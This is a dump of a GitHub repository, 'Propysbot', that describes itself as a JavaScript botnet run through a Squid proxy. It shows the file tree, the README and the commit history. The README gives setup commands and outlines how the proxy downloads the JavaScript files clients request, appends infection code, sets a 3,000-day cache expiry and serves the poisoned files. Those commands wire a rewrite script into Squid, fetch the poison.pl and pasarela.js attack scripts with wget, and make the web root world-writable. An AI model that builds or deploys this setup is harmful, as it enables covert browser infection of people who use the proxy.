======================: FILES :======================
Propysbot
├── carter.html
├── jquery.3.23.1.1.php
├── pasarela.js
├── poison.pl
├── README.md
└── squid.conf

0 directories, 6 files
======================: README CONTENT :======================
# Propysbot
Botnet Javascript in Server Proxy

# about
Moving from an environment that specifically infects a
JavaScript file, we decided that the best way to create the
botnet would be if bots did "motu proprio", it means, not a
forced man in the middle, but chosen by themselves. Hereby
we decided to focus on the TOR network and Proxy servers
used on the Internet.

# Starting
```
apt-get install squid3
cd /etc/squid3/
nano squid.conf 
  write: url_rewrite_program /usr/bin/perl /etc/squid3/poison.pl in last line
wget https://raw.githubusercontent.com/RedToor/Propysbot/master/poison.pl
nano poison.pl 
  modify the line:
  print "http://myip:80/tmp/$pid-$count.js\n"; # REPLACE_IP
  with you ip 
wget https://raw.githubusercontent.com/RedToor/Propysbot/master/pasarela.js
chmod 777 /var/www/html/
service apache2 start
service squid3 start
```
# Logic
1) Download the file from its original location.<br>
2) Save it to a temporary location.<br>
3) Add the JavaScript infection code at the end of the
JavaScript file.<br>
4) Make that file has an expiration date of 3,000 days.<br>
5) Deliver to the clients the new created JavaScript file.<br>

http://cave-rt.blogspot.com/2015/06/como-hacer-una-botnet-js-con-squid-proxy.html
====================== GIT HISTORY: ======================
a507f39 HEAD@{0}: clone: from https://github.com/chancn/Propysbot
commit a507f39305a1d51c390eedc50d0ffb946b763f86
Author: RedToor <09890@hotmail.com>
Date:   Sun Aug 9 19:45:45 2015 -0500

    Update poison.pl

commit 7eb2c5cbbd55760b559127e5ea6a79bddd9ea962
Author: RedToor <09890@hotmail.com>
Date:   Sun Aug 9 19:44:47 2015 -0500

    Update README.md

commit f24edf933a4014ac39a17e75d039f7416930ae9c
Author: RedToor <09890@hotmail.com>
Date:   Sun Aug 9 19:30:59 2015 -0500

    Create README.md

commit 49c34b8a89cdfb26dbcd8c4400000eca274b8054
Author: redtoor <redtoor@live.com>
Date:   Sat Aug 8 13:18:42 2015 -0500

    Starting a new project

commit 1182a660ad377ba858f5c61932cd061f106cae43
Author: redtoor <redtoor@live.com>
Date:   Sat Aug 8 13:17:04 2015 -0500

    :circus_tent: Added .gitattributes & .gitignore files
